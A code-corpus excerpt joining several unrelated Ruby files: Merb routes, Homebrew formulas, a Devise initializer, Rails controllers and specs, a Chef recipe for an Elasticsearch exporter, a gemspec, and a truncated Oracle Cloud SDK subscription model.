# to(:controller => ":module/:controller")
#
# You can specify conditions on the placeholder by passing a hash as the second
# argument of "match"
#
# match("/registration/:course_name", :course_name => /^[a-z]{3,5}-\d{5}$/).
# to(:controller => "registration")
#
# You can also use regular expressions, deferred routes, and many other options.
# See merb/specs/merb/router.rb for a fairly complete usage sample.
Merb.logger.info("Compiling routes...")
Merb::Router.prepare do
# RESTful routes
# resources :posts
# Adds the required routes for merb-auth using the password slice
# slice(:merb_auth_slice_password, :name_prefix => nil, :path_prefix => "")
slice(:chef_server_slice)
# This is the default route for /:controller/:action/:id
# This is fine for most cases. If you're heavily using resource-based
# routes, you may want to comment/remove this line to prevent
# clients from calling your create or destroy actions with a GET
default_routes
# Change this for your home page to be available at /
# match('/').to(:controller => 'whatever', :action =>'index')
end
| 37.844444 | 85 | 0.698767 |
183c58b0f35e4c8043aab8de4fa2c80c41f1815f | 1,090 | class Cproto < Formula
desc "Generate function prototypes for functions in input files"
homepage "https://invisible-island.net/cproto/"
url "https://invisible-mirror.net/archives/cproto/cproto-4.7o.tgz"
mirror "https://deb.debian.org/debian/pool/main/c/cproto/cproto_4.7o.orig.tar.gz"
sha256 "c76b0b72064e59709459bb7d75d6ec929f77ce5ae7f2610d169ba0fa20ccb44f"
bottle do
cellar :any_skip_relocation
sha256 "10ca6eb5bb793309be3dc367b013b97f3ab199cccfc27b0fac2dbdfcb8b73a62" => :mojave
sha256 "c3cb1dc57b52471d2ce88ee243dbc72bd96984ee23c6508f316fd037f283d144" => :high_sierra
sha256 "371d43e22636bad41b4a37d7abd06bc42b504b0790a14a6c54f0b5d03b693cf3" => :sierra
end
def install
system "./configure", "--disable-debug",
"--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make", "install"
end
test do
(testpath/"woot.c").write("int woot() {\n}")
assert_match(/int woot.void.;/, shell_output("#{bin}/cproto woot.c"))
end
end
| 37.586207 | 93 | 0.699083 |
7a862ebef14bb9332c2908b4bc04070f4cfa3d99 | 1,345 | # -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
module Migrator
def db_version
"5.4.1"
end
def one_version
"OpenNebula 5.4.1"
end
def up
return true
end
end
| 44.833333 | 78 | 0.409665 |
397403c3d6ca22c6e868b280cbd72aced6b92826 | 2,063 | module CelluloidIOPGListener
module Initialization
#
# Null Object Pattern, just in case there are no options passed to initialize
#
# @conninfo_hash - Extracted (actually removed!) PG database connection options, such as would be sent to:
# PG.connect( *args ) # PG::Connection.new( *args )
# Options must be the same named parameters that PG.connect() expects in its argument hash
# The other parameter formats are accepted by PG::Connection.new are not supported here.
# Named after, and structurally identical to, PG::Connection#conninfo_hash
# @super_signature - Arguments passed on to super, supports any type of argument signature / arity supported by Ruby itself.
# @channel - The channel to listen to notifications on
# Default: None, raises an error if not provided.
#
class ClientExtractedSignature
# see http://deveiate.org/code/pg/PG/Connection.html for key meanings
KEYS = [:host, :hostaddr, :port, :dbname, :user, :password, :connect_timeout, :options, :tty, :sslmode, :krbsrvname, :gsslib, :service]
attr_reader :super_signature
attr_reader :conninfo_hash
attr_reader :channel
# args - an array
def initialize(*args)
hash_arg = args.last.is_a?(Hash) ? args.pop : {}
# Extract the channel first, as it is required
@channel = hash_arg[:channel] || raise(ArgumentError, "[#{self.class}] :channel is required, but got #{args} and #{hash_arg}")
# Extract the args for PG.connect
@conninfo_hash = (hash_arg.keys & KEYS).
each_with_object({}) { |k,h| h.update(k => hash_arg[k]) }.
# Future proof. Provide a way to send in any PG.connect() options not explicitly defined in KEYS
merge(hash_arg[:conninfo_hash] || {})
# Add any other named parameters back to the args for super
args << hash_arg
@super_signature = args
end
end
end
end
| 49.119048 | 141 | 0.636452 |
e22e65914c64866930a8805fac382a9923ef6b86 | 11,335 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class with default "from" parameter.
config.mailer_sender = "[email protected]"
# Configure the class responsible to send e-mails.
# config.mailer = "Devise::Mailer"
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [ :email ]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [ :email ]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [ :email ]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Basic Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:token]` will
# enable it only for token authentication.
# config.http_authenticatable = false
# If http headers should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. "Application" by default.
# config.http_authentication_realm = "Application"
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# :http_auth and :token_auth by adding those symbols to the array below.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing :skip => :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 10. If
# using other encryptors, it sets how many times you want the password re-encrypted.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments.
config.stretches = Rails.env.test? ? 1 : 10
# Setup a pepper to generate the encrypted password.
# config.pepper = "e0a1729ce89577b6ca7510ca4625d2d5c2cf2d9cfb214629b55d660ff42f44272e75858eed89e3bdf558db8a949c6dd6f512b7f7a0ef787547ed76aeaf59f1fd"
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming his account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming his account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming his account.
# config.allow_unconfirmed_access_for = 2.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed new email is stored in
# unconfirmed email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [ :email ]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# :secure => true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length. Default is 6..128.
# config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# an one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
# config.email_regexp = /\A[^@]+@[^@]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# If true, expires auth token on session timeout.
# config.expire_auth_token_on_timeout = false
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [ :email ]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [ :email ]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# ==> Configuration for :encryptable
# Allow you to use another encryption algorithm besides bcrypt (default). You can use
# :sha1, :sha512 or encryptors from others authentication tools as :clearance_sha1,
# :authlogic_sha512 (then you should set stretches above to 20 for default behavior)
# and :restful_authentication_sha1 (then you should set stretches to 10, and copy
# REST_AUTH_SITE_KEY to pepper)
# config.encryptor = :sha512
# ==> Configuration for :token_authenticatable
# Defines name of the authentication token params key
# config.token_authentication_key = :auth_token
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ["*/*", :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', :scope => 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(:scope => :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: "/my_engine"
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using omniauth, Devise cannot automatically set Omniauth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = "/my_engine/users/auth"
# ==> Devise Authy Authentication Extension
# How long should the user's device be remembered for.
config.authy_remember_device = 1.minute
end
| 47.62605 | 150 | 0.746096 |
91dfcaf4d06fb034e148e5af818456e62a656338 | 1,104 | class PostsController < ApplicationController
before_action :set_post, only: [:show, :edit, :update, :destroy]
# GET /posts
def index
@posts = Post.all
end
# GET /posts/1
def show
end
# GET /posts/new
def new
@post = Post.new
end
# GET /posts/1/edit
def edit
end
# POST /posts
def create
@post = Post.new(post_params)
if @post.save
redirect_to @post, notice: 'Post was successfully created.'
else
render :new
end
end
# PATCH/PUT /posts/1
def update
if @post.update(post_params)
redirect_to @post, notice: 'Post was successfully updated.'
else
render :edit
end
end
# DELETE /posts/1
def destroy
@post.destroy
redirect_to posts_url, notice: 'Post was successfully destroyed.'
end
private
# Use callbacks to share common setup or constraints between actions.
def set_post
@post = Post.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def post_params
params.require(:post).permit(:title, :user_id, :category_id)
end
end
| 18.711864 | 73 | 0.648551 |
ac9b5f47c2f1fea5aca899572b890bc62c46c3cd | 1,066 | require 'formula'
class Gcab < Formula
homepage 'https://wiki.gnome.org/msitools'
url 'http://ftp.gnome.org/pub/GNOME/sources/gcab/0.4/gcab-0.4.tar.xz'
sha1 'd81dfe35125e611e3a94c0d4def37ebf62b9187c'
depends_on 'intltool' => :build
depends_on 'pkg-config' => :build
depends_on 'vala' => :build
depends_on 'gettext'
depends_on 'glib'
depends_on 'gobject-introspection'
# work around ld not understanding --version-script argument
# upstream bug: https://bugzilla.gnome.org/show_bug.cgi?id=708257
patch :DATA
def install
system "./configure", "--disable-debug",
"--prefix=#{prefix}"
system "make", "install"
end
end
__END__
diff --git a/Makefile.in b/Makefile.in
index 2264c17..7782d62 100644
--- a/Makefile.in
+++ b/Makefile.in
@@ -474,7 +474,7 @@ libgcab_1_0_la_CPPFLAGS = \
libgcab_1_0_la_LIBADD = -lz $(GLIB_LIBS)
libgcab_1_0_la_LDFLAGS = \
-version-info 0:0:0 \
- -Wl,--version-script=${srcdir}/libgcab.syms \
+ -Wl \
-no-undefined \
$(NULL)
| 26.65 | 71 | 0.652908 |
4ad2b99b7e8985ff40b7e19d9988865c56da9379 | 1,773 | #
# Cookbook:: prometheus
# Recipe:: elasticsearch_exporter
#
# Copyright:: 2018, BaritoLog.
include_recipe "prometheus::user"
# Create directory
directory node["elasticsearch_exporter"]["dir"] do
owner node["prometheus"]["user"]
group node["prometheus"]["group"]
mode "0755"
recursive true
end
directory node["elasticsearch_exporter"]["log_dir"] do
owner node["prometheus"]["user"]
group node["prometheus"]["group"]
mode "0755"
recursive true
end
# Download prometheus elasticsearch_exporter binary & unpack
ark ::File.basename(node["elasticsearch_exporter"]["dir"]) do
url node["elasticsearch_exporter"]["binary_url"]
checksum node["elasticsearch_exporter"]["checksum"]
version node["elasticsearch_exporter"]["version"]
prefix_root Chef::Config["file_cache_path"]
path ::File.dirname(node["elasticsearch_exporter"]["dir"])
owner node["prometheus"]["user"]
group node["prometheus"]["group"]
action :put
notifies :restart, "service[elasticsearch_exporter]", :delayed
end
systemd_unit "elasticsearch_exporter.service" do
content <<~END_UNIT
[Unit]
Description=Prometheus Elasticsearch Exporter
After=network.target
[Service]
ExecStart=/bin/bash -ce 'exec #{node["elasticsearch_exporter"]["binary"]} #{Gitlab::Prometheus.kingpin_flags_for(node, "elasticsearch_exporter")} >> "#{node["elasticsearch_exporter"]["log_dir"]}/elasticsearch_exporter.log" 2>&1'
User=#{node["prometheus"]["user"]}
Restart=always
[Install]
WantedBy=multi-user.target
END_UNIT
action %i(create enable)
notifies :restart, "service[elasticsearch_exporter]", :delayed
end
service "elasticsearch_exporter" do
action %i(enable start)
end
| 30.568966 | 240 | 0.702764 |
08fc975dee57bd75ff8780f0b8a1f22d9731a6a0 | 1,946 | lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "codenewbie/version"
Gem::Specification.new do |spec|
spec.name = "codenewbie"
spec.version = Codenewbie::VERSION
spec.authors = ["Molly McCarron"]
spec.email = ["[email protected]"]
spec.summary = %q{Codenewbie podcast CLI.}
spec.description = %q{Lists of podcast epsiodes from https://www.codenewbie.org/podcast}
spec.homepage = "https://github.com/mccarronmollye/codenewbie"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
#if spec.respond_to?(:metadata)
# spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
# spec.metadata["homepage_uri"] = spec.homepage
# spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
# spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
#else
# raise "RubyGems 2.0 or newer is required to protect against " \
# "public gem pushes."
#end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "bin"
spec.executables = ["codenewbie"]
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.17"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "pry"
spec.add_development_dependency "gem-release"
spec.add_development_dependency "nokogiri"
end | 44.227273 | 96 | 0.684995 |
e8cd1760139a4d5a757dc0dbc08837565cf9eddb | 1,230 | require 'spec_helper'
describe NotificationsController do
include SocialStream::TestHelpers
render_views
before do
@user = Factory(:user)
@actor = @user.actor
sign_in @user
@receipt = @user.notify("subject", "body", Factory(:activity))
end
it "should render index" do
get :index
assert_response :success
end
it "should update read" do
put :update, :id => @receipt.notification.to_param, :read => "Read"
@receipt.notification.is_unread?(@actor).should==false
assert_response :success
end
it "should update unread" do
put :update, :id => @receipt.notification.to_param, :read => "Unread"
@receipt.notification.is_unread?(@actor).should==true
assert_response :success
end
it "should update all" do
@receipt2 = @user.notify("subject", "body", Factory(:activity))
put :update_all
@receipt.notification.is_unread?(@actor).should==false
@receipt2.notification.is_unread?(@actor).should==false
response.should redirect_to(notifications_path)
end
it "should send to trash" do
delete :destroy, :id => @receipt.notification.to_param
@receipt.notification.is_trashed?(@actor).should==true
assert_response :success
end
end
| 26.170213 | 73 | 0.699187 |
796bb85b8fe2528c5a26f265307a09763022d4bc | 1,271 | require 'rails_spec_helper'
describe 'AppMap tracer via Railtie' do
before(:all) { @fixture_dir = 'spec/fixtures/rails_users_app' }
include_context 'Rails app pg database'
let(:env) { {} }
let(:cmd) { %(docker-compose run --rm -e RAILS_ENV -e APPMAP app ./bin/rails r "puts Rails.configuration.appmap.enabled.inspect") }
let(:command_capture2) do
require 'open3'
Open3.capture3(env, cmd, chdir: @fixture_dir).tap do |result|
unless result[2] == 0
$stderr.puts <<~END
Failed to run rails_users_app container
<<< Output:
#{result[0]}
#{result[1]}
>>> End of output
END
raise 'Failed to run rails_users_app container'
end
end
end
let(:command_output) { command_capture2[0].strip }
let(:command_result) { command_capture2[2] }
it 'is disabled by default' do
expect(command_output).to eq('nil')
end
describe 'with APPMAP=true' do
let(:env) { { 'APPMAP' => 'true' } }
it 'is enabled' do
expect(command_output).to eq('true')
end
context 'and RAILS_ENV=test' do
let(:env) { { 'APPMAP' => 'true', 'RAILS_ENV' => 'test' } }
it 'is disabled' do
expect(command_output).to eq('nil')
end
end
end
end
| 28.244444 | 133 | 0.612116 |
21b890d27c203586a931b6078ab08c7de788c721 | 20,985 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Subscription object which contains the common subscription data.
class OspGateway::Models::SubscriptionSummary
PLAN_TYPE_ENUM = [
PLAN_TYPE_FREE_TIER = 'FREE_TIER'.freeze,
PLAN_TYPE_PAYG = 'PAYG'.freeze,
PLAN_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
UPGRADE_STATE_ENUM = [
UPGRADE_STATE_PROMO = 'PROMO'.freeze,
UPGRADE_STATE_SUBMITTED = 'SUBMITTED'.freeze,
UPGRADE_STATE_ERROR = 'ERROR'.freeze,
UPGRADE_STATE_UPGRADED = 'UPGRADED'.freeze,
UPGRADE_STATE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
UPGRADE_STATE_DETAILS_ENUM = [
UPGRADE_STATE_DETAILS_TAX_ERROR = 'TAX_ERROR'.freeze,
UPGRADE_STATE_DETAILS_UPGRADE_ERROR = 'UPGRADE_ERROR'.freeze,
UPGRADE_STATE_DETAILS_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# Subscription id identifier (OCID).
# @return [String]
attr_accessor :id
# **[Required]** Subscription plan number.
# @return [String]
attr_accessor :subscription_plan_number
# Subscription plan type.
# @return [String]
attr_reader :plan_type
# Start date of the subscription.
# @return [DateTime]
attr_accessor :time_start
# Ship to customer account site address id.
# @return [String]
attr_accessor :ship_to_cust_acct_site_id
# Ship to customer account role.
# @return [String]
attr_accessor :ship_to_cust_acct_role_id
# Bill to customer Account id.
# @return [String]
attr_accessor :bill_to_cust_account_id
# Payment intension.
# @return [BOOLEAN]
attr_accessor :is_intent_to_pay
# Currency code
# @return [String]
attr_accessor :currency_code
# GSI Subscription external code.
# @return [String]
attr_accessor :gsi_org_code
# Language short code (en, de, hu, etc)
# @return [String]
attr_accessor :language_code
# GSI organization external identifier.
# @return [String]
attr_accessor :organization_id
# Status of the upgrade.
# @return [String]
attr_reader :upgrade_state
# This field is used to describe the Upgrade State in case of error (E.g. Upgrade failure caused by interfacing Tax details- TaxError)
# @return [String]
attr_reader :upgrade_state_details
# @return [OCI::OspGateway::Models::TaxInfo]
attr_accessor :tax_info
# Payment option list of a subscription.
# @return [Array<OCI::OspGateway::Models::PaymentOption>]
attr_accessor :payment_options
# @return [OCI::OspGateway::Models::PaymentGateway]
attr_accessor :payment_gateway
# @return [OCI::OspGateway::Models::BillingAddress]
attr_accessor :billing_address
# Date of upgrade/conversion when planType changed from FREE_TIER to PAYG
# @return [DateTime]
attr_accessor :time_plan_upgrade
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'id': :'id',
'subscription_plan_number': :'subscriptionPlanNumber',
'plan_type': :'planType',
'time_start': :'timeStart',
'ship_to_cust_acct_site_id': :'shipToCustAcctSiteId',
'ship_to_cust_acct_role_id': :'shipToCustAcctRoleId',
'bill_to_cust_account_id': :'billToCustAccountId',
'is_intent_to_pay': :'isIntentToPay',
'currency_code': :'currencyCode',
'gsi_org_code': :'gsiOrgCode',
'language_code': :'languageCode',
'organization_id': :'organizationId',
'upgrade_state': :'upgradeState',
'upgrade_state_details': :'upgradeStateDetails',
'tax_info': :'taxInfo',
'payment_options': :'paymentOptions',
'payment_gateway': :'paymentGateway',
'billing_address': :'billingAddress',
'time_plan_upgrade': :'timePlanUpgrade'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'id': :'String',
'subscription_plan_number': :'String',
'plan_type': :'String',
'time_start': :'DateTime',
'ship_to_cust_acct_site_id': :'String',
'ship_to_cust_acct_role_id': :'String',
'bill_to_cust_account_id': :'String',
'is_intent_to_pay': :'BOOLEAN',
'currency_code': :'String',
'gsi_org_code': :'String',
'language_code': :'String',
'organization_id': :'String',
'upgrade_state': :'String',
'upgrade_state_details': :'String',
'tax_info': :'OCI::OspGateway::Models::TaxInfo',
'payment_options': :'Array<OCI::OspGateway::Models::PaymentOption>',
'payment_gateway': :'OCI::OspGateway::Models::PaymentGateway',
'billing_address': :'OCI::OspGateway::Models::BillingAddress',
'time_plan_upgrade': :'DateTime'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :id The value to assign to the {#id} property
# @option attributes [String] :subscription_plan_number The value to assign to the {#subscription_plan_number} property
# @option attributes [String] :plan_type The value to assign to the {#plan_type} property
# @option attributes [DateTime] :time_start The value to assign to the {#time_start} property
# @option attributes [String] :ship_to_cust_acct_site_id The value to assign to the {#ship_to_cust_acct_site_id} property
# @option attributes [String] :ship_to_cust_acct_role_id The value to assign to the {#ship_to_cust_acct_role_id} property
# @option attributes [String] :bill_to_cust_account_id The value to assign to the {#bill_to_cust_account_id} property
# @option attributes [BOOLEAN] :is_intent_to_pay The value to assign to the {#is_intent_to_pay} property
# @option attributes [String] :currency_code The value to assign to the {#currency_code} property
# @option attributes [String] :gsi_org_code The value to assign to the {#gsi_org_code} property
# @option attributes [String] :language_code The value to assign to the {#language_code} property
# @option attributes [String] :organization_id The value to assign to the {#organization_id} property
# @option attributes [String] :upgrade_state The value to assign to the {#upgrade_state} property
# @option attributes [String] :upgrade_state_details The value to assign to the {#upgrade_state_details} property
# @option attributes [OCI::OspGateway::Models::TaxInfo] :tax_info The value to assign to the {#tax_info} property
# @option attributes [Array<OCI::OspGateway::Models::PaymentOption>] :payment_options The value to assign to the {#payment_options} property
# @option attributes [OCI::OspGateway::Models::PaymentGateway] :payment_gateway The value to assign to the {#payment_gateway} property
# @option attributes [OCI::OspGateway::Models::BillingAddress] :billing_address The value to assign to the {#billing_address} property
# @option attributes [DateTime] :time_plan_upgrade The value to assign to the {#time_plan_upgrade} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.id = attributes[:'id'] if attributes[:'id']
self.subscription_plan_number = attributes[:'subscriptionPlanNumber'] if attributes[:'subscriptionPlanNumber']
raise 'You cannot provide both :subscriptionPlanNumber and :subscription_plan_number' if attributes.key?(:'subscriptionPlanNumber') && attributes.key?(:'subscription_plan_number')
self.subscription_plan_number = attributes[:'subscription_plan_number'] if attributes[:'subscription_plan_number']
self.plan_type = attributes[:'planType'] if attributes[:'planType']
raise 'You cannot provide both :planType and :plan_type' if attributes.key?(:'planType') && attributes.key?(:'plan_type')
self.plan_type = attributes[:'plan_type'] if attributes[:'plan_type']
self.time_start = attributes[:'timeStart'] if attributes[:'timeStart']
raise 'You cannot provide both :timeStart and :time_start' if attributes.key?(:'timeStart') && attributes.key?(:'time_start')
self.time_start = attributes[:'time_start'] if attributes[:'time_start']
self.ship_to_cust_acct_site_id = attributes[:'shipToCustAcctSiteId'] if attributes[:'shipToCustAcctSiteId']
raise 'You cannot provide both :shipToCustAcctSiteId and :ship_to_cust_acct_site_id' if attributes.key?(:'shipToCustAcctSiteId') && attributes.key?(:'ship_to_cust_acct_site_id')
self.ship_to_cust_acct_site_id = attributes[:'ship_to_cust_acct_site_id'] if attributes[:'ship_to_cust_acct_site_id']
self.ship_to_cust_acct_role_id = attributes[:'shipToCustAcctRoleId'] if attributes[:'shipToCustAcctRoleId']
raise 'You cannot provide both :shipToCustAcctRoleId and :ship_to_cust_acct_role_id' if attributes.key?(:'shipToCustAcctRoleId') && attributes.key?(:'ship_to_cust_acct_role_id')
self.ship_to_cust_acct_role_id = attributes[:'ship_to_cust_acct_role_id'] if attributes[:'ship_to_cust_acct_role_id']
self.bill_to_cust_account_id = attributes[:'billToCustAccountId'] if attributes[:'billToCustAccountId']
raise 'You cannot provide both :billToCustAccountId and :bill_to_cust_account_id' if attributes.key?(:'billToCustAccountId') && attributes.key?(:'bill_to_cust_account_id')
self.bill_to_cust_account_id = attributes[:'bill_to_cust_account_id'] if attributes[:'bill_to_cust_account_id']
self.is_intent_to_pay = attributes[:'isIntentToPay'] unless attributes[:'isIntentToPay'].nil?
raise 'You cannot provide both :isIntentToPay and :is_intent_to_pay' if attributes.key?(:'isIntentToPay') && attributes.key?(:'is_intent_to_pay')
self.is_intent_to_pay = attributes[:'is_intent_to_pay'] unless attributes[:'is_intent_to_pay'].nil?
self.currency_code = attributes[:'currencyCode'] if attributes[:'currencyCode']
raise 'You cannot provide both :currencyCode and :currency_code' if attributes.key?(:'currencyCode') && attributes.key?(:'currency_code')
self.currency_code = attributes[:'currency_code'] if attributes[:'currency_code']
self.gsi_org_code = attributes[:'gsiOrgCode'] if attributes[:'gsiOrgCode']
raise 'You cannot provide both :gsiOrgCode and :gsi_org_code' if attributes.key?(:'gsiOrgCode') && attributes.key?(:'gsi_org_code')
self.gsi_org_code = attributes[:'gsi_org_code'] if attributes[:'gsi_org_code']
self.language_code = attributes[:'languageCode'] if attributes[:'languageCode']
raise 'You cannot provide both :languageCode and :language_code' if attributes.key?(:'languageCode') && attributes.key?(:'language_code')
self.language_code = attributes[:'language_code'] if attributes[:'language_code']
self.organization_id = attributes[:'organizationId'] if attributes[:'organizationId']
raise 'You cannot provide both :organizationId and :organization_id' if attributes.key?(:'organizationId') && attributes.key?(:'organization_id')
self.organization_id = attributes[:'organization_id'] if attributes[:'organization_id']
self.upgrade_state = attributes[:'upgradeState'] if attributes[:'upgradeState']
raise 'You cannot provide both :upgradeState and :upgrade_state' if attributes.key?(:'upgradeState') && attributes.key?(:'upgrade_state')
self.upgrade_state = attributes[:'upgrade_state'] if attributes[:'upgrade_state']
self.upgrade_state_details = attributes[:'upgradeStateDetails'] if attributes[:'upgradeStateDetails']
raise 'You cannot provide both :upgradeStateDetails and :upgrade_state_details' if attributes.key?(:'upgradeStateDetails') && attributes.key?(:'upgrade_state_details')
self.upgrade_state_details = attributes[:'upgrade_state_details'] if attributes[:'upgrade_state_details']
self.tax_info = attributes[:'taxInfo'] if attributes[:'taxInfo']
